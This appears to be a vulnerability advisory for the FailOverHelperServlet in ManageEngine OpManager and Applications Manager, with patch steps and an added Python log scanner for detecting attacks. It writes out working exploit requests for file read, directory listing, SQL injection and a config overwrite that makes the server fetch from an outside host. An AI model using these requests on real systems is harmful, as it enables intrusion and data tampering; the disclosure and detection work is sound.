Vulnerabilities in FailOverHelperServlet
>> Technical details:
The affected servlet is the "FailOverHelperServlet" or, if you prefer,
FailServlet.
It is possible to hijack the failover operation completely.
#1
Vulnerability: Local file include
Constraints: unauthenticated in all products
Affected versions: ManageEngine Applications Manager v? to v11.Y
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX
POST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\boot.ini
#2
Vulnerability: Information disclosure - list all files in a directory
and its children
Constraints: unauthenticated in all products
Affected versions: ManageEngine Applications Manager v? to v11.Y
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX
POST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\
#3
Vulnerability: Blind SQL injection
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX
Constraints: unauthenticated in OpManager and Applications Manager;
authenticated in IT360
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2]
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a
#4
Vulnerability: Database configuration file overwrite
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX
Constraints: unauthenticated in OpManager and Applications Manager;
authenticated in IT360
This will cause the server to make a request to
http://192.168.56.101/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServletcopy?operation=copyfile&fileName=bla
in exactly the same way as vulnerability #1. The file will then overwrite
./conf/database_params.conf
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=requestToConfBackup&serverhost=192.168.56.101&serverport=80&webprotocol=http&fileName=bla
#5
Vulnerability: License configuration file overwrite
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX
Note that you can only overwrite the license file with another valid
license and do not control the path. So it's a very very low risk
vulnerability (if it can be called that).
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=licensefile
We have a patch for these vulnerabilities for build 11400.
Steps to apply the patch:
1. Stop the OpManager service.
2. Take a backup of the <OpManager home>\WEB-INF\classes\com\adventnet\me\opmanager\servlet folder.
3. Extract the attached zip under <OpManager home>.
It will extract the patch under the WEB-INF\classes\com\adventnet\me\opmanager\servlet folder.
4. Stop and start OpManager.
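To review web access logs for requests to this servlet, the following added example (not part of the original advisory or of the ManageEngine patch) flags FailOverHelperServlet requests and maps the operation parameter to the item numbers listed above. The log format, the FAILOVER_PEERS allow-list and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Operation name -> item number in the advisory above.
OPERATIONS = {"copyfile": 1, "listdirectory": 2, "standbyupdateincentral": 3,
              "requesttoconfbackup": 4, "licensefile": 5}
# Assumption: the only address with a legitimate reason to call the servlet.
FAILOVER_PEERS = {"10.0.0.21"}  # placeholder standby server

# Assumption: common/combined access log format.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def scan(lines, peers=FAILOVER_PEERS):
    """Return one finding per servlet request that is not plain peer traffic."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        src, method, target, status = m.groups()
        url = urlsplit(target)
        if "failoverhelperservlet" not in url.path.lower():
            continue
        # Only the query string is visible; POST body parameters are not logged.
        params = parse_qs(url.query, keep_blank_values=True)
        op = params.get("operation", [""])[0].lower()
        # serverhost tells the server where to fetch from (item 4), so it must
        # also be a known peer for the request to count as expected traffic.
        if src in peers and params.get("serverhost", [src])[0] in peers:
            continue
        findings.append({
            "src": src, "method": method, "status": int(status),
            "operation": op,
            "item": OPERATIONS.get(op),  # None: operation not in the advisory
            "params": {k: v[0] for k, v in params.items() if k != "operation"},
        })
    return findings

# Constructed sample lines, not real traffic.
SAMPLE = [
    '203.0.113.5 - - [01/Jan/2015:10:01:02 +0000] "POST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:%5C HTTP/1.1" 200 512',
    '10.0.0.21 - - [01/Jan/2015:10:02:00 +0000] "POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=licensefile HTTP/1.1" 200 64',
    '203.0.113.5 - - [01/Jan/2015:10:03:00 +0000] "GET /index.jsp HTTP/1.1" 200 1024',
    '10.0.0.21 - - [01/Jan/2015:10:04:00 +0000] "POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=requestToConfBackup&serverhost=192.168.56.101&serverport=80&webprotocol=http&fileName=bla HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A finding with a 200 status on an unpatched build is worth following up by checking ./conf/database_params.conf and the license file against the backup taken in step 2.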